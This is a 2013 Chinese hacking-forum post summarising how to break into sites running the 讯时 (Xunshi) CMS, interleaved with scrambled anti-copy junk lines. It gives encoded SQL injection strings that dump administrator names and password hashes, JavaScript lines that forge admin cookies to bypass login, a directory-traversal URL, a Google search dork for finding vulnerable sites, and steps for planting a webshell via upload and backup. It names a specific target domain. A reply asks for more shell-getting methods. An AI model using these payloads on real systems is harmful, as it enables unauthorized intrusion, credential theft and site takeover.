中国网络渗透测试联盟
标题:
讯时漏洞总结
[打印本页]
作者:
admin
时间:
2013-1-16 21:25
标题:
讯时漏洞总结
by:血封忆尘
' S( V, i- {( `8 Z
% J1 V$ T& R/ ^: J
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
7 }4 N+ N! i+ {5 b& k
! {% V. u! e( u9 o
以下本文总结来自黑防去年第9期杂志上的内容...
8 x& W8 N( O0 e* a$ L. p4 {
4 Q; {2 [, e* r
先说一个注入吧:
http://www.political-security.com/news_more.asp?lm=2
%41nd 1=2 union %53elect 1,2,3,0x3b%
3 Y) U W# M1 @
, N# j( \7 r+ A
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
1 T' H1 F# l( K
! o; \6 M# O5 N$ {0 M
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
& x$ G8 V2 y: `( }; U. S+ ~9 @
这里一个注入
: x$ _2 U7 F' o6 i. b" ]7 A/ ^
- V8 Q! {( k/ W' Y: @
效果如图:
- y1 u( ]! ?/ k7 K
. p' D9 p; x' y# |" O
& v+ l9 \% y6 c: Y% x
! X* f$ _% }: \, X; g3 |
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
# r/ j5 }1 q! z1 o. P% z" t
% V P B+ }: p3 t
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
6 e& a$ q7 ]: a1 ^
4 W+ W' i( H! G' z
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
W7 f: `2 \& Q6 d5 f4 ]: ]4 l
/ _3 H' x0 O+ k. S3 V# p& `
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
' W8 |* c5 ?) u0 R3 e$ u# h
$ |6 Z4 ?3 o9 n$ V5 b0 l+ k& t
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
' @; t* j* \& t$ R2 f9 C5 L% }
: p4 Q6 E3 e# F/ Q0 M: q: s
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
0 f! U& g b4 R& [3 K1 ]) |
4 N% p3 J" x5 u2 P3 w# D) a
访问这页面来列目录..步骤如下:
/ D+ Z$ D- N3 b( N: D/ K
# q; Z% }0 E2 y- Q. X; K* r
javascript:alert(document.cookie="admindj=1")
! X2 i: b- V' o; G( G( V2 B
" k+ D7 H5 C, I3 L* e3 F
http://www.political-security.co ... asp?id=46&dir=../..
+ m. Y8 U2 D: _3 ?
6 p( V+ s0 \1 Y1 }3 U
效果如图:
8 N0 q4 ]; J3 a; V5 m( n+ G- d
9 }2 m, M$ Y/ r% F. c( C- n s# [) {
. k3 y" ^ H. T0 [& y3 z" P2 L5 g
$ I' J- ~6 F5 U0 f* m1 i w3 a
这样全站目录都能瞧了..找到后台目录..进去..
# e6 Q+ d s1 |7 M
9 ?3 F" x3 j, f* o# G
那么进了后台怎么拿shell??上传--备份就ok了..
: R- [. ]9 ?: G# |3 O, z* X
8 `4 p0 H- P0 ]8 \/ q7 Z
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
6 t& U' F$ T# i
& M! G$ T' M ~' V9 j
这个我也碰到过一次..你都可以通过列目录来实现..
; d7 q! I# S+ i4 Z ^: @
4 c# Z; C+ S8 V {/ U9 \
javascript:alert(document.cookie="admindj=1")
9 S2 m: P# |6 a, ]& M( l u
% D, x M7 C7 |5 p4 p) L4 \
http://www.political-security.co ... p?action=BackupData
5 n; L( T: p# }+ F& L* @
9 ^; ?! d- w7 j4 g# [3 b
备份ok..
: p% f f% i" z- L+ x& |& X1 I
4 K. W( r. D& I1 W0 T& |- l
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
( G4 K: w5 F* `" u% P+ r
2 K7 g9 x4 |2 _6 h
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
' n8 o" ]# E& w Z
7 Z, @, L) R8 B" a
然后访问此页面进行注入..步骤如下:
6 I: f: f2 [9 u1 l4 B1 k
* M/ g6 y5 n1 w9 z( [- h
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
; F! a; q& a; Z: Q, ]2 ^
, k4 U) h2 G s$ k/ z# u: L4 Q4 Q: C
然后请求admin/admin_chk.asp页面
8 C1 g3 n* H3 H1 U, K- J
6 d2 A7 @: Y4 [: n9 y7 ^
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
# g3 M% f1 N8 c- M+ n
" y. P9 F9 }6 J" K: w8 O
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
7 s* \1 O( u* X6 B" U
0 D+ p% F: e2 L. z4 G9 G( w
效果如图所示:
`$ g" F8 Z0 c5 G
! y8 _2 L, d/ a/ v9 d
) \; |# @* j! W0 t2 ~4 E$ L
* E# g6 ]7 C3 B6 t$ O* H
讯时漏洞2
/ g0 A% D8 d6 b' T
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
% }* Z+ w# f% }7 m0 Z7 d/ c& z
. ?! c/ Y* _/ @+ [7 ^* ^
1、/admin/admin_news_pl_view.asp?id=1
- u* Z- p/ V, `/ V. L. N. g( e9 ^* M/ g- W
//id任意 填入以下语句
+ l5 \; x- [ e
7 Q, c" X7 G$ F
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
6 |# J) W( f$ F2 M& G' V) {7 c
' e( ]7 Q! x/ q
5 l3 K1 D# I$ ]) G4 B
+ b6 r6 [7 X: Z- I3 k* R0 r( P
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
3 q0 z0 A( H8 Y. o
0 J2 C) \8 ?: }; ?
$ P- x1 |0 R5 p; j! S. f& a
( ^+ L4 F% B6 h4 t Y% h- `
爆出管理员帐号和密码了
) t! V7 C% W0 x! @
& w9 r; \! B6 e3 A- ?) r' `
7 U; S8 w- ]. {
; [5 F- @: v8 P1 z( ~
4、cookies进后台
+ `- \# `- e: \1 M7 l
9 q2 N s, d& X l3 X) ]7 I
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
, _* ?2 \9 j' V0 Z! `' H5 t3 |
% w2 ?, D% q- [$ R) N$ q# w
1 h- I! L7 [& H
( x, C9 r! {% X% h( [
5、后台用了cookie验证,直接访问
http://www.political-security.com/admin/admin_index.asp
就OK了!
: Y% Z; a' n6 O: f( o0 T
9 d i2 I, K/ U" T! G8 k f/ U
4 O5 }5 J9 U# L3 r
5 b9 i0 N+ L: D- z. H5 Y
6、后台有上传和备份取SHELL不难。
0 i" o: r9 d4 w) [' o; I8 f
% e- U! }9 M) A
7、讯时还有个列目录漏洞:
http://www.political-security.co ... asp?id=46&dir=../..
. D9 Q$ D0 i, z! C8 s
, c5 x% e/ H; \7 }! e* B
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问
http://www.political-security.com
/admin/admin_db_backup.asp?action=BackupData
,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
5 [; z+ {! {* y S; l; A
/ U9 a- M* {+ J; R2 ~
7 Y/ W- t& g: t' t4 \
8 Q8 v, d, s: K% a, J1 J1 t8 d
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2